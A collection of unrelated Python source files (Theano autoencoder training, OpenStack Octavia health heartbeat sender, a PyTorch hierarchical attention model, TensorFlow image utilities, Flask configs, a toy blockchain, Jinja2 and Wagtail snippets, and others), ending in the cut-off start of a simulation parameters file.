num_capsule = 2
epsilon = 0.0001
num_epoch = 200
ae = Autoencoder(scene, D, 300, 30, 10, num_capsule)
opt = MGDAutoOptimizer(ae)
train_ae = opt.optimize(train_data)
get_recon = theano.function([], ae.get_reconstruct(train_data[0])[:,:,0])
get_center= theano.function([], ae.encoder(train_data[0]))
recon = get_recon()
center = get_center()[0]
imsave('output/test_balls0.png', recon)
print '...Initial center1 (%g,%g,%g)' % (center[0], center[1], center[2])
print recon.sum()
n=0;
while (n<num_epoch):
n+=1
eps = get_epsilon(epsilon, num_epoch, n)
train_loss = train_ae(eps)
center = get_center()[0]
print '...Epoch %d Train loss %g, Center (%g, %g, %g)' \
% (n, train_loss, center[0], center[1], center[2])
if n % 10 ==0:
image = get_recon()
imsave('output/test_balls%d.png' % (n,), image)
|
py | b41114d36c09cb5798cfc8c84f7efdd6c1848120 | #! /usr/bin/env python
# Copyright 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import errno
import os
import time
from oslo_config import cfg
from oslo_log import log as logging
import six
from octavia.amphorae.backends.agent.api_server import util
from octavia.amphorae.backends.health_daemon import health_sender
from octavia.amphorae.backends.utils import haproxy_query
from octavia.amphorae.backends.utils import keepalivedlvs_query
if six.PY2:
import Queue as queue # pylint: disable=wrong-import-order
else:
import queue # pylint: disable=wrong-import-order
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
SEQ = 0
# MSG_VER is an incrementing integer heartbeat message format version
# this allows for backward compatibility when the amphora-agent is older
# than the controller version and the message format has backwards
# incompatible changes.
#
# ver 1 - Adds UDP listener status when no pool or members are present
#
MSG_VER = 1
def list_sock_stat_files(hadir=None):
stat_sock_files = {}
if hadir is None:
hadir = CONF.haproxy_amphora.base_path
listener_ids = util.get_listeners()
for listener_id in listener_ids:
sock_file = listener_id + ".sock"
stat_sock_files[listener_id] = os.path.join(hadir, sock_file)
return stat_sock_files
def run_sender(cmd_queue):
LOG.info('Health Manager Sender starting.')
sender = health_sender.UDPStatusSender()
keepalived_cfg_path = util.keepalived_cfg_path()
keepalived_pid_path = util.keepalived_pid_path()
while True:
try:
# If the keepalived config file is present check
# that it is running, otherwise don't send the health
# heartbeat
if os.path.isfile(keepalived_cfg_path):
# Is there a pid file for keepalived?
with open(keepalived_pid_path, 'r') as pid_file:
pid = int(pid_file.readline())
os.kill(pid, 0)
message = build_stats_message()
sender.dosend(message)
except IOError as e:
# Missing PID file, skip health heartbeat
if e.errno == errno.ENOENT:
LOG.error('Missing keepalived PID file %s, skipping health '
'heartbeat.', keepalived_pid_path)
else:
LOG.error('Failed to check keepalived and haproxy status due '
'to exception %s, skipping health heartbeat.', e)
except OSError as e:
# Keepalived is not running, skip health heartbeat
if e.errno == errno.ESRCH:
LOG.error('Keepalived is configured but not running, '
'skipping health heartbeat.')
else:
LOG.error('Failed to check keepalived and haproxy status due '
'to exception %s, skipping health heartbeat.', e)
except Exception as e:
LOG.error('Failed to check keepalived and haproxy status due to '
'exception %s, skipping health heartbeat.', e)
try:
cmd = cmd_queue.get_nowait()
if cmd == 'reload':
LOG.info('Reloading configuration')
CONF.reload_config_files()
elif cmd == 'shutdown':
LOG.info('Health Manager Sender shutting down.')
break
except queue.Empty:
pass
time.sleep(CONF.health_manager.heartbeat_interval)
def get_stats(stat_sock_file):
stats_query = haproxy_query.HAProxyQuery(stat_sock_file)
stats = stats_query.show_stat()
pool_status = stats_query.get_pool_status()
return stats, pool_status
def build_stats_message():
global SEQ
msg = {'id': CONF.amphora_agent.amphora_id,
'seq': SEQ, "listeners": {},
'ver': MSG_VER}
SEQ += 1
stat_sock_files = list_sock_stat_files()
for listener_id, stat_sock_file in stat_sock_files.items():
listener_dict = {'pools': {},
'status': 'DOWN',
'stats': {
'tx': 0,
'rx': 0,
'conns': 0,
'totconns': 0,
'ereq': 0}}
msg['listeners'][listener_id] = listener_dict
if util.is_listener_running(listener_id):
(stats, pool_status) = get_stats(stat_sock_file)
listener_dict = msg['listeners'][listener_id]
for row in stats:
if row['svname'] == 'FRONTEND':
listener_dict['stats']['tx'] = int(row['bout'])
listener_dict['stats']['rx'] = int(row['bin'])
listener_dict['stats']['conns'] = int(row['scur'])
listener_dict['stats']['totconns'] = int(row['stot'])
listener_dict['stats']['ereq'] = int(row['ereq'])
listener_dict['status'] = row['status']
for oid, pool in pool_status.items():
if oid != listener_id:
pool_id = oid
pools = listener_dict['pools']
pools[pool_id] = {"status": pool['status'],
"members": pool['members']}
# UDP listener part
udp_listener_ids = util.get_udp_listeners()
if udp_listener_ids:
listeners_stats = keepalivedlvs_query.get_udp_listeners_stats()
if listeners_stats:
for listener_id, listener_stats in listeners_stats.items():
pool_status = keepalivedlvs_query.get_udp_listener_pool_status(
listener_id)
udp_listener_dict = dict()
udp_listener_dict['status'] = listener_stats['status']
udp_listener_dict['stats'] = {
'tx': listener_stats['stats']['bout'],
'rx': listener_stats['stats']['bin'],
'conns': listener_stats['stats']['scur'],
'totconns': listener_stats['stats']['stot'],
'ereq': listener_stats['stats']['ereq']
}
udp_listener_dict['pools'] = {}
if pool_status:
udp_listener_dict['pools'] = {
pool_status['lvs']['uuid']: {
"status": pool_status['lvs']['status'],
"members": pool_status['lvs']['members']}}
msg['listeners'][listener_id] = udp_listener_dict
return msg
|
py | b4111520f13f6e906a35b204b657729d82d70457 | import torch
from torch import nn
from typing import Tuple, Dict
from src.nlp import abstract_embeddings
from src.models import abstract_preprocessor
from src.utils import registry, vocab
from src.datasets.hanitem import HANItem
from src.datasets.han_dataset import HANDataset
from src.datasets.bert_han_dataset import BERTHANDataset
@registry.register('model', 'HAN')
class HANModel(torch.nn.Module):
class Preprocessor(abstract_preprocessor.AbstractPreproc):
def __init__(self, preprocessor):
super().__init__()
self.preprocessor: abstract_preprocessor.AbstractPreproc = registry.instantiate(
callable=registry.lookup("preprocessor", preprocessor["name"]),
config=preprocessor,
unused_keys=("name", "final_layer_dim", "final_layer_dropout")
)
def get_vocab(self) -> vocab.Vocab:
return self.preprocessor.get_vocab()
def get_dataset_size(self, section: str) -> int:
return self.preprocessor.get_dataset_size(section)
def get_embedder(self) -> abstract_embeddings.Embedder:
return self.get_embedder()
def get_num_classes(self) -> int:
return self.preprocessor.get_num_classes()
def get_max_doc_length(self) -> int:
return self.preprocessor.get_max_doc_length()
def get_max_sent_length(self) -> int:
return self.preprocessor.get_max_sent_length()
def validate_item(self, item: HANItem, section: str) -> Tuple[bool, str]:
item_result, validation_info = self.preprocessor.validate_item(item, section)
return item_result, validation_info
def add_item(self, item: HANItem, section: str, validation_info: str):
self.preprocessor.add_item(item, section, validation_info)
def clear_items(self) -> None:
self.preprocessor.clear_items()
def save(self) -> None:
self.preprocessor.save()
def load(self) -> None:
self.preprocessor.load()
def label_to_id_map(self) -> Dict:
return self.preprocessor.label_to_id_map()
def dataset(self, section):
print(f"Loading dataset of section: {section}")
if "bert" in str(type(self.preprocessor)).lower(): # check if it's BERT-based model or not
return BERTHANDataset(
self.preprocessor.dataset(section),
self.label_to_id_map(),
self.get_max_sent_length(),
self.get_max_doc_length(),
self.get_num_classes(),
self.get_dataset_size(section),
self.get_tokenizer(),
)
return HANDataset(
self.preprocessor.dataset(section),
self.label_to_id_map(),
self.get_vocab(),
self.get_max_sent_length(),
self.get_max_doc_length(),
self.get_num_classes(),
self.get_dataset_size(section),
)
def get_tokenizer(self):
return self.preprocessor.get_tokenizer()
def create_validation_set(self, val_split: float, path: str) -> None:
self.preprocessor.create_validation_set(val_split, path)
def __init__(self, preprocessor, device, word_attention, sentence_attention, final_layer_dim, final_layer_dropout):
super().__init__()
self.preprocessor = preprocessor
self.word_attention = registry.instantiate(
callable=registry.lookup("word_attention", word_attention["name"]),
config=word_attention,
unused_keys=("name",),
device=device,
preprocessor=preprocessor.preprocessor
)
self.sentence_attention = registry.instantiate(
callable=registry.lookup("sentence_attention", sentence_attention["name"]),
config=sentence_attention,
unused_keys=("name",),
device=device,
)
self.mlp = nn.Sequential(
torch.nn.Linear(
self.sentence_attention.recurrent_size, final_layer_dim
), nn.ReLU(), nn.Dropout(final_layer_dropout),
torch.nn.Linear(final_layer_dim, self.preprocessor.get_num_classes())
)
self.loss = nn.CrossEntropyLoss(reduction="mean").to(device)
def forward(self, docs, doc_lengths, sent_lengths, labels=None, attention_masks=None, token_type_ids=None):
"""
:param docs: encoded document-level data; LongTensor (num_docs, padded_doc_length, padded_sent_length)
:param doc_lengths: unpadded document lengths; LongTensor (num_docs)
:param sent_lengths: unpadded sentence lengths; LongTensor (num_docs, max_sent_len)
:param labels: labels; LongTensor (num_docs)
:param attention_masks: BERT attention masks; LongTensor (num_docs, padded_doc_length, padded_sent_length)
:param token_type_ids: BERT token type IDs; LongTensor (num_docs, padded_doc_length, padded_sent_length)
:return: class scores, attention weights of words, attention weights of sentences, loss
"""
# get sentence embedding for each sentence by passing it in the word attention model
if attention_masks is not None and token_type_ids is not None:
sent_embeddings, doc_perm_idx, docs_valid_bsz, word_att_weights = self.word_attention(
docs, doc_lengths, sent_lengths, attention_masks, token_type_ids
)
else:
sent_embeddings, doc_perm_idx, docs_valid_bsz, word_att_weights = self.word_attention(
docs, doc_lengths, sent_lengths
)
# get document embedding for each document by passing the sentence embeddings in the sentence attention model
doc_embeds, word_att_weights, sentence_att_weights = self.sentence_attention(
sent_embeddings, doc_perm_idx, docs_valid_bsz, word_att_weights
)
scores = self.mlp(doc_embeds)
outputs = (scores, word_att_weights, sentence_att_weights,)
if labels is not None:
loss = self.loss(scores, labels)
return outputs + (loss,)
return outputs
|
py | b4111525f04322c540d8cced475e4b0dd024a92d | import numpy as np
import tensorflow as tf
from tensorflow.python.ops import control_flow_ops
slim = tf.contrib.slim
def im2uint8(x):
if x.__class__ == tf.Tensor:
return tf.cast(tf.clip_by_value(x, 0.0, 1.0) * 255.0, tf.uint8)
else:
t = np.clip(x, 0.0, 1.0) * 255.0
return t.astype(np.uint8)
def get_shape(x):
shape = tf.shape(x)
check = tf.Assert(tf.reduce_all(shape >= 0), ["EASYFLOW: Need value.shape >= 0, got ", shape])
shape = control_flow_ops.with_dependencies([check], shape)
return [shape[i] for i in range(shape.shape.as_list()[0])]
def zero_upsampling(x, scale_factor):
dims = x.get_shape().as_list()
if len(dims) == 5:
n, t, h, w, c = dims
y = tf.concat([x] + [tf.zeros_like(x)] * (scale_factor ** 2 - 1), -1)
y = tf.reshape(y, [n, t, h, w, scale_factor, scale_factor, c])
y = tf.transpose(y, [0, 1, 2, 4, 3, 5, 6])
y = tf.reshape(y, [n, t, h * scale_factor, w * scale_factor, c])
elif len(dims) == 4:
n, h, w, c = dims
y = tf.concat([x] + [tf.zeros_like(x)] * (scale_factor ** 2 - 1), -1)
y = tf.reshape(y, [n, h, w, scale_factor, scale_factor, c])
y = tf.transpose(y, [0, 1, 3, 2, 4, 5])
y = tf.reshape(y, [n, h * scale_factor, w * scale_factor, c])
return y
def leaky_relu(x, alpha=0.1):
return tf.maximum(x, alpha * x)
def prelu(x):
alphas = tf.get_variable('alpha', x.get_shape()[-1],
initializer=tf.constant_initializer(0.0),
dtype=tf.float32)
pos = tf.nn.relu(x)
neg = alphas * (x - tf.abs(x)) * 0.5
return pos + neg
def display_tf_variables(train_vars):
print ('Training Variables: ')
for var in train_vars:
print ('\t', var.name)
def resize_images(images, size, method=2, align_corners=False):
dims = len(images.get_shape())
if dims == 5:
n, t, h, w, c = images.get_shape().as_list()
images = tf.reshape(images, [n * t, h, w, c])
images = tf.image.resize_images(images, size, method, align_corners)
if dims == 5:
images = tf.reshape(images, [n, t, size[0], size[1], c])
return images
def rgb2y(inputs):
with tf.name_scope('rgb2y'):
if inputs.get_shape()[-1].value == 1:
return inputs
assert inputs.get_shape()[-1].value == 3, 'Error: rgb2y input should be RGB or grayscale!'
dims = len(inputs.get_shape())
if dims == 4:
scale = tf.reshape([65.481, 128.553, 24.966], [1, 1, 1, 3]) / 255.0
elif dims == 5:
scale = tf.reshape([65.481, 128.553, 24.966], [1, 1, 1, 1, 3]) / 255.0
output = tf.reduce_sum(inputs * scale, reduction_indices=dims - 1, keep_dims=True)
output = output + 16 / 255.0
return output
def rgb2ycbcr(inputs):
with tf.name_scope('rgb2ycbcr'):
if inputs.get_shape()[-1].value == 1:
return inputs
assert inputs.get_shape()[-1].value == 3, 'Error: rgb2ycbcr input should be RGB or grayscale!'
ndims = len(inputs.get_shape())
origT = [[65.481, 128.553, 24.966], [-37.797, -74.203, 112], [112, -93.786, -18.214]]
origOffset = [16.0, 128.0, 128.0]
if ndims == 4:
origT = [tf.reshape(origT[i], [1, 1, 1, 3]) / 255.0 for i in range(3)]
elif ndims == 5:
origT = [tf.reshape(origT[i], [1, 1, 1, 1, 3]) / 255.0 for i in range(3)]
output = []
for i in range(3):
output.append(tf.reduce_sum(inputs * origT[i], reduction_indices=-1, keep_dims=True) + origOffset[i] / 255.0)
return tf.concat(output, -1)
def ycbcr2rgb(inputs):
with tf.name_scope('ycbcr2rgb'):
if inputs.get_shape()[-1].value == 1:
return inputs
assert inputs.get_shape()[-1].value == 3, 'Error: rgb2ycbcr input should be RGB or grayscale!'
ndims = len(inputs.get_shape())
# origT = np.array([[65.481, 128.553, 24.966], [-37.797 -74.203 112], [112 -93.786 -18.214]])
# T = tf.inv(origT)
Tinv = [[0.00456621, 0., 0.00625893], [0.00456621, -0.00153632, -0.00318811], [0.00456621, 0.00791071, 0.]]
origOffset = [16.0, 128.0, 128.0]
if ndims == 4:
origT = [tf.reshape(Tinv[i], [1, 1, 1, 3]) * 255.0 for i in range(3)]
origOffset = tf.reshape(origOffset, [1, 1, 1, 3]) / 255.0
elif ndims == 5:
origT = [tf.reshape(Tinv[i], [1, 1, 1, 1, 3]) * 255.0 for i in range(3)]
origOffset = tf.reshape(origOffset, [1, 1, 1, 1, 3]) / 255.0
output = []
for i in range(3):
output.append(tf.reduce_sum((inputs - origOffset) * origT[i], reduction_indices=-1, keep_dims=True))
return tf.concat(output, -1)
def rgb2gray(inputs):
with tf.name_scope('rgb2gray'):
if inputs.get_shape()[-1].value == 1:
return inputs
assert inputs.get_shape()[-1].value == 3, 'Error: rgb2y input should be RGB or grayscale!'
dims = len(inputs.get_shape())
if dims == 4:
scale = tf.reshape([0.299, 0.587, 0.114], [1, 1, 1, 3])
elif dims == 5:
scale = tf.reshape([0.299, 0.587, 0.114], [1, 1, 1, 1, 3])
output = tf.reduce_sum(inputs * scale, reduction_indices=dims - 1, keep_dims=True)
return output
|
py | b41115adb98f5f1d3092bef70e248669408bc1eb | # -*- coding: utf-8 -*-
import os
class BaseConfig:
DEBUG = False
TESTING = False
PROJECT_ROOT = os.path.abspath('.')
SQLALCHEMY_DATABASE_URI = f'sqlite:///{os.path.join(PROJECT_ROOT, "db.sqlite")}'
SQLALCHEMY_TRACK_MODIFICATIONS = False
JWT_SECRET_KEY = os.urandom(32)
JWT_IDENTITY_CLAIM = 'sub'
JWT_ERROR_MESSAGE_KEY = 'error'
JWT_HEADER_TYPE = 'JWT'
class DevelopmentConfig(BaseConfig):
DEBUG = True
SQLALCHEMY_DATABASE_URI = 'postgres://postgres:postgres@db:5432/evolux_challenge'
JWT_SECRET_KEY = 'mysupersecretkey'
class TestingConfig(BaseConfig):
TESTING = True
SQLALCHEMY_DATABASE_URI = 'sqlite://'
class ProductionConfig(BaseConfig):
SQLALCHEMY_DATABASE_URI = os.getenv('SQLALCHEMY_DATABASE_URI')
JWT_SECRET_KEY = os.getenv('JWT_SECRET_KEY')
|
py | b411173eb64d98d18c4482d60dd8975b4b095961 | import tkinter as tk
class Seekbar(tk.Canvas):
def __init__(self, parent, **options):
tk.Canvas.__init__(self, parent, options)
self.parent = parent
self.width = options['width']
self.red_rectangle = self.create_rectangle(0, 0, 0, 0, fill="red")
self.seekbar_knob_image = tk.PhotoImage(file="../icons/seekbar_knob.gif")
self.seekbar_knob = self.create_image(
0, 0, image=self.seekbar_knob_image)
self.bind_mouse_button()
def bind_mouse_button(self):
self.bind('<Button-1>', self.on_seekbar_clicked)
self.bind('<B1-Motion>', self.on_seekbar_clicked)
self.tag_bind(
self.red_rectangle, '<B1-Motion>', self.on_seekbar_clicked)
self.tag_bind(
self.seekbar_knob, '<B1-Motion>', self.on_seekbar_clicked)
def on_seekbar_clicked(self, event=None):
if event.x > 0 and event.x < self.width:
self.slide_to_position(event.x)
def slide_to_position(self, new_position):
self.coords(self.red_rectangle, 0, 0, new_position, new_position)
self.coords(self.seekbar_knob, new_position, 0)
self.event_generate("<<SeekbarPositionChanged>>", x=new_position)
class TestSeekBar():
def __init__(self):
root = tk.Tk()
root.bind("<<SeekbarPositionChanged>>", self.seek_new_position)
frame = tk.Frame(root)
frame.grid(row=1, pady=10, padx=10)
c = Seekbar(
frame, background="blue", width=360, height=10)
c.grid(row=2, columnspan=10, sticky='ew', padx=5)
root.mainloop()
def seek_new_position(self, event):
print("Dragged to x:", event.x)
if __name__ == '__main__':
TestSeekBar()
|
py | b4111920cd9d6f39b9f0f7f2cdb5ed85cdc876d3 | from __future__ import unicode_literals, print_function
from jinja2 import FileSystemLoader, StrictUndefined
from jinja2.environment import Environment
'''
>> nxos_bgp_include.j2 <<
feature bgp
router bgp {{ local_as }}
{% include 'bgp_ipv4_routes.j2' %} {# appends a separate FILE's content on this place #}
neighbor {{ peer1_ip }} remote-as {{ peer1_as }}
update-source loop1
ebgp-multihop 2
address-family ipv4 unicast
!
{%- include eigrp_template %} {# eigrp_template is a VARIABLE defined in the dictionary #}
>> bgp_ipv4_routes.j2 <<
address-family ipv4 unicast
network {{ advertised_route1 }}
network {{ advertised_route2 }}
network {{ advertised_route3 }}
>> eigrp_template1.j2 <<
router eigrp 1
!
address-family ipv4 vrf CORP
network 10.115.79.49 0.0.0.0
network 10.115.79.170 0.0.0.0
network 10.115.79.174 0.0.0.0
!
network 10.115.68.0 0.0.0.255
network 10.115.78.0 0.0.0.255
passive-interface default
no passive-interface Vlan920
no passive-interface Vlan921
autonomous-system 1
eigrp router-id 10.115.79.49
eigrp stub connected summary
nsf
exit-address-family
!
'''
env = Environment(undefined=StrictUndefined) # CREATE ENVIRONMENT: defines, that every variable {{}} in the template needs also strictly
# a variable value defined somewhere in the code/ Otherwise it will fail
# in case you don't want a strict behavior (variable may be missing), use just "env = Environment()"
env.loader = FileSystemLoader('.') # WHERE TO FIND ENVIRONMENT: defines where the template to load from.
# In this case '.' it is in the current working directory
bgp_vars = {
'hostname' : 'test-rt1',
'local_as' : '10',
'peer1_ip' : '10.255.255.2',
'peer1_as' : '20',
'advertised_route1' : '10.10.200.0/24',
'advertised_route2' : '10.10.201.0/24',
'advertised_route3' : '10.10.202.0/24',
'eigrp_template' : 'eigrp_template1.j2',
}
template_file = 'nxos_bgp_include.j2' # name of the template file
template = env.get_template(template_file) # load the template file to the environment
output = template.render(**bgp_vars) # loads all attributes from dictionary intf_vars
print (output) |
py | b41119a300129f71807aabcfc623f9dd78c1f1a5 | from django.contrib.contenttypes.models import ContentType
from django.core.paginator import Paginator
from django.http import Http404
from django.template.response import TemplateResponse
from wagtail.core.models import Page
def content_type_use(request, content_type_app_name, content_type_model_name):
try:
content_type = ContentType.objects.get_by_natural_key(
content_type_app_name, content_type_model_name
)
except ContentType.DoesNotExist:
raise Http404
page_class = content_type.model_class()
# page_class must be a Page type and not some other random model
if not issubclass(page_class, Page):
raise Http404
pages = page_class.objects.all().specific(defer=True)
paginator = Paginator(pages, per_page=10)
pages = paginator.get_page(request.GET.get("p"))
return TemplateResponse(
request,
"wagtailadmin/pages/content_type_use.html",
{
"pages": pages,
"app_name": content_type_app_name,
"content_type": content_type,
"page_class": page_class,
},
)
|
py | b4111a024602d8e6971dde5f36849ca1db47e89c | class Booking:
def __init__(self, id = None, datetime_start = None, datetime_end = None, entry_time = None, exit_time = None, amount = None, id_user = None, id_vehicle = None, id_parking_slot = None, note = ""):
self._id = id
self._datetime_start = datetime_start
self._datetime_end = datetime_end
self._entry_time = entry_time
self._exit_time = exit_time
self._amount = amount
self._id_user = id_user
self._id_vehicle = id_vehicle
self._id_parking_slot = id_parking_slot
self._note = note
def set_id(self, id):
self._id = id
def set_datetime_start(self, datetime_start):
self._datetime_start = datetime_start
def set_datetime_end(self, datetime_end):
self._datetime_end = datetime_end
def set_entry_time(self, entry_time):
self._entry_time = entry_time
def set_exit_time(self, exit_time):
self._exit_time = exit_time
# def set_amount(self, amount):
# self._amount = amount
# def set_id_user(self, id_user):
# self._id_user = id_user
#
# def set_id_vehicle(self, id_vehicle):
# self._id_vehicle = id_vehicle
#
# def set_id_parking_slot(self, id_parking_slot):
# self._id_parking_slot = id_parking_slot
def set_note(self, note):
self._note = note
def get_id(self):
return self._id
def get_datetime_start(self):
return self._datetime_start
def get_datetime_end(self):
return self._datetime_end
def get_entry_time(self):
return self._entry_time
def get_exit_time(self):
return self._exit_time
def get_amount(self):
return self._amount
def get_id_user(self):
return self._id_user
def get_id_vehicle(self):
return self._id_vehicle
def get_id_parking_slot(self):
return self._id_parking_slot
def get_note(self):
return self._note
def __eq__(self, other):
if isinstance(other, Booking):
return self._id == other._id
return NotImplemented
def __str__(self):
booking_info = (f"Booking Id: {self._id}, datetime start: {self._datetime_start}, datetime end: {self._datetime_end}, entry time: {self._entry_time}, "
f"exit time: {self._exit_time}, amount: {self._amount}, id user: {self._id_user}, id vehicle: {self._id_vehicle}, "
f"id parking slot: {self._id_parking_slot}, note: {self._note}")
return booking_info
|
py | b4111a6a37b74b29162256b26f67991e1c393123 | import hashlib, json, requests
from time import time
from uuid import uuid4
from textwrap import dedent
from flask import Flask, jsonify, request
from urllib.parse import urlparse
# block = {
# 'index': 1,
# 'timestamp': 1506057125.900785,
# 'transactions': [
# {
# 'sender': "8527147fe1f5426f9dd545de4b27ee00",
# 'recipient': "a77f5cdfa2934df3954a5c7c7da5df1f",
# 'amount': 5,
# }
# ],
# 'proof': 324984774000,
# 'previous_hash': "2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824"
# }
class Blockchain(object):
def __init__(self):
self.chain = []
self.current_transactions = []
self.nodes = set()
# O bloco genesis
self.newBlock(previous_hash=1, proof=100)
def newBlock(self, proof, previous_hash=None):
block = {
'index': len(self.chain) + 1,
'timestamp': time(),
'transactions': self.current_transactions,
'proof': proof,
'previous_hash': previous_hash or self.hash(self.chain[-1])
}
self.current_transactions = [] # Reseta a lista de transações
self.chain.append(block) # Adiciona o bloco à cadeia de blocos
return block
def newTransaction(self, sender, recipient, amount):
self.current_transactions.append({
'sender': sender,
'recipient': recipient,
'amount': amount
}) # Adiciona transação ao bloco
return self.lastBlock['index'] + 1 # Retorna o index do bloco da transação
@staticmethod
def hash(block):
blockString = json.dumps(block, sort_keys=True).encode() # O dicionário é ordenado pelas chaves para previnir hashes inconsistentes
return hashlib.sha256(blockString).hexdigest() # Transforma em hash e depois transforma em string
def proofOfWork(self, last_proof): # Gera o PoW do bloco
# Algoritmo:
# - Encontre um número p' em que seu hash com a solução do bloco anterior seja um hash que termina em [n] [ny]s.
proof = 0
while self.validProof(last_proof, proof) is False:
proof += 1
return proof
@staticmethod
def validProof(last_proof, proof): # Valida a PoW
guess = f'{last_proof}{proof}'.encode()
guess_hash = hashlib.sha256(guess).hexdigest()
return guess_hash[:4] == "0000"
def registerNode(self, address):
parsed_url = urlparse(address)
self.nodes.add(parsed_url.netloc)
def validChain(self, chain):
lastBlock = chain[0]
currentIndex = 1
while currentIndex < len(chain):
block = chain[currentIndex]
print(f'{lastBlock}')
print(f'{block}')
print(f'\n-----------\n')
# Checa se o hash do bloco está correto
if block['previous_hash'] != self.hash(lastBlock):
return False
# Checa se a PoW está correta
if not self.validProof(lastBlock['proof'], block['proof']):
return False
last_block = block
currentIndex += 1
return True
def resolveConflicts(self):
# Essa função se baseia no Algoritmo do Consenso, o qual resolve conflitos nos Nodes ao trocar a cadeia atual pela mais longa na rede.
neighbours = self.nodes
newChain = None
maxLength = len(self.chain)
for node in neighbours:
response = requests.get(f"http://{node}/chain")
if response.status_code == 200:
length = response.json()['length']
chain = response.json()['chain']
# Checa se o tamanho da cadeia é maior e checa se a cadeia é válida
if length > maxLength and self.validChain(chain):
maxLength = length
newChain = chain
# Troca a cadeia se uma nova for descoberta
if newChain:
self.chain = newChain
return True
return False
@property
def lastBlock(self):
return self.chain[-1]
# Node
app = Flask(__name__)
# Gera um endereço único para esse Node (aleatório)
nodeId = str(uuid4()).replace('-', '')
# Instancia a Blockchain
blockchain = Blockchain()
# Criando os endpoints da API
@app.route('/mine', methods=['GET'])
def mine():
# To-do
# - Calcular o PoW
# - Dar a recompensa ao minerador, adicionando uma transação que garante 1 moeda
# - Criar um novo bloco, adicionando-o à cadeia de blocos / blockchain
# Calclar o PoW
lastBlock = blockchain.lastBlock
lastProof = lastBlock['proof']
proof = blockchain.proofOfWork(lastProof)
# Dar a recompensa ao minerador, adicionando uma transação que garante 1 moeda; O 'sender' é 0 para indicar que esse Node minerou uma nova moeda
blockchain.newTransaction(
sender = "0",
recipient = nodeId,
amount = 1
)
# Criar um novo bloco, adicionando-o à cadeia de blocos / blockchain
previousHash = blockchain.hash(lastBlock)
block = blockchain.newBlock(proof, previousHash)
# Resposta do endpoint da API
response = {
'message': "Novo bloco criado",
'index': block['index'],
'transactions': block['transactions'],
'proof': block['proof'],
'previous_hash': block['previous_hash']
}
return jsonify(response), 200
@app.route('/transactions/new', methods=['POST'])
def newTranscation():
values = request.get_json()
# Checa se todos os valores foram satisfeitos
required = ['sender', 'recipient', 'amount']
if not all(k in values for k in required):
return 'Valores faltando', 400
# Cria a transação
index = blockchain.newTransaction(values['sender'], values['recipient'], values['amount'])
response = {'message': f'A transação vai ser adicionada ao bloco {index}'} # Mensagem de resposta do endpoint
return jsonify(response), 201
@app.route('/chain', methods=['GET'])
def fullChain():
response = {
'chain': blockchain.chain,
'length': len(blockchain.chain),
}
return jsonify(response), 200
@app.route('/nodes/register', methods=['POST'])
def registerNodes():
values = request.get_json()
nodes = values.get('nodes')
if nodes is None:
return "Erro: É necessário que uma lista válida de Nodes seja passada", 400
for node in nodes:
blockchain.registerNode(node)
response = {
'message': 'Novos Nodes foram adicionados',
'total_nodes': list(blockchain.nodes)
}
return jsonify(response), 201
@app.route('/nodes/resolve', methods=['GET'])
def consensus():
replaced = blockchain.resolveConflicts()
if replaced:
response = {
'message': 'A cadeia foi trocada',
'new_chain': blockchain.chain
}
else:
response = {
'message': 'A cadeia permanece a mesma',
'chain': blockchain.chain
}
return jsonify(response), 200
# Rodando o Node
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000) |
py | b4111ae0bfc1c440afe858ea9f8af7fc7dd02849 | import os
import subprocess
from m2cgen import assemblers, interpreters
from tests import utils
from tests.e2e.executors import base
EXECUTOR_CODE_TPL = """
using System;
namespace TestConsoleApp {{
class Program {{
static void Main(string[] args) {{
double[] input_ = new double[args.Length];
for(int i = 0; i < input_.Length; ++i) {{
input_[i] = double.Parse(args[i]);
}}
{print_code}
}}
}}
}}
"""
EXECUTE_AND_PRINT_SCALAR = """
double res = ML.Model.Score(input_);
Console.Write(res);
"""
EXECUTE_AND_PRINT_VECTOR = """
double[] res = ML.Model.Score(input_);
for(int i = 0; i < res.Length; ++i) {
Console.Write("{0} ", res[i]);
}
"""
class CSharpExecutor(base.BaseExecutor):
target_exec_dir = None
project_name = "test_model"
_dotnet = "dotnet"
def __init__(self, model):
self.model = model
self.interpreter = interpreters.CSharpInterpreter()
assembler_cls = assemblers.get_assembler_cls(model)
self.model_ast = assembler_cls(model).assemble()
def predict(self, X):
exec_args = [os.path.join(self.target_exec_dir, self.project_name)]
exec_args.extend(map(utils.format_arg, X))
return utils.predict_from_commandline(exec_args)
@classmethod
def prepare_global(cls, **kwargs):
super().prepare_global(**kwargs)
if cls.target_exec_dir is None:
cls.target_exec_dir = os.path.join(cls._global_tmp_dir, "bin")
subprocess.call([cls._dotnet,
"new",
"console",
"--output",
cls._global_tmp_dir,
"--name",
cls.project_name,
"--language",
"C#"])
def prepare(self):
if self.model_ast.output_size > 1:
print_code = EXECUTE_AND_PRINT_VECTOR
else:
print_code = EXECUTE_AND_PRINT_SCALAR
executor_code = EXECUTOR_CODE_TPL.format(
print_code=print_code)
model_code = self.interpreter.interpret(self.model_ast)
model_file_name = os.path.join(self._global_tmp_dir, "Model.cs")
executor_file_name = os.path.join(self._global_tmp_dir, "Program.cs")
with open(model_file_name, "w") as f:
f.write(model_code)
with open(executor_file_name, "w") as f:
f.write(executor_code)
subprocess.call([self._dotnet,
"build",
os.path.join(self._global_tmp_dir,
f"{self.project_name}.csproj"),
"--output",
self.target_exec_dir])
|
py | b4111affd08408261146446af27a1c333ae0160c |
# parameters.py
"""
Exp 557 - {'Initial_genes': '5000', 'Host_mutation_rate': '0.30', 'TE_progeny': '0.00, 0, 0.55, 1, 0.30, 2, 0.15, 3', 'TE_Insertion_Distribution': 'Triangle( pmax=0, pzero=3.0/3.0 )', 'Carrying_capacity': '30', 'TE_excision_rate': '0.1', 'Junk_BP': '1.4', 'Gene_Insertion_Distribution': 'Triangle( pzero=1.0/3.0, pmax=1 )', 'mutation_effect': '0.10', 'TE_death_rate': '0.0005'}
"""
from TEUtil import *;
# note that "#" indicates a comment
# set the following to True if you want messages printed to the screen
# while the program runs - search for these keywords in TESim.py to see
# what each one prints out
output = {
"SPLAT": False,
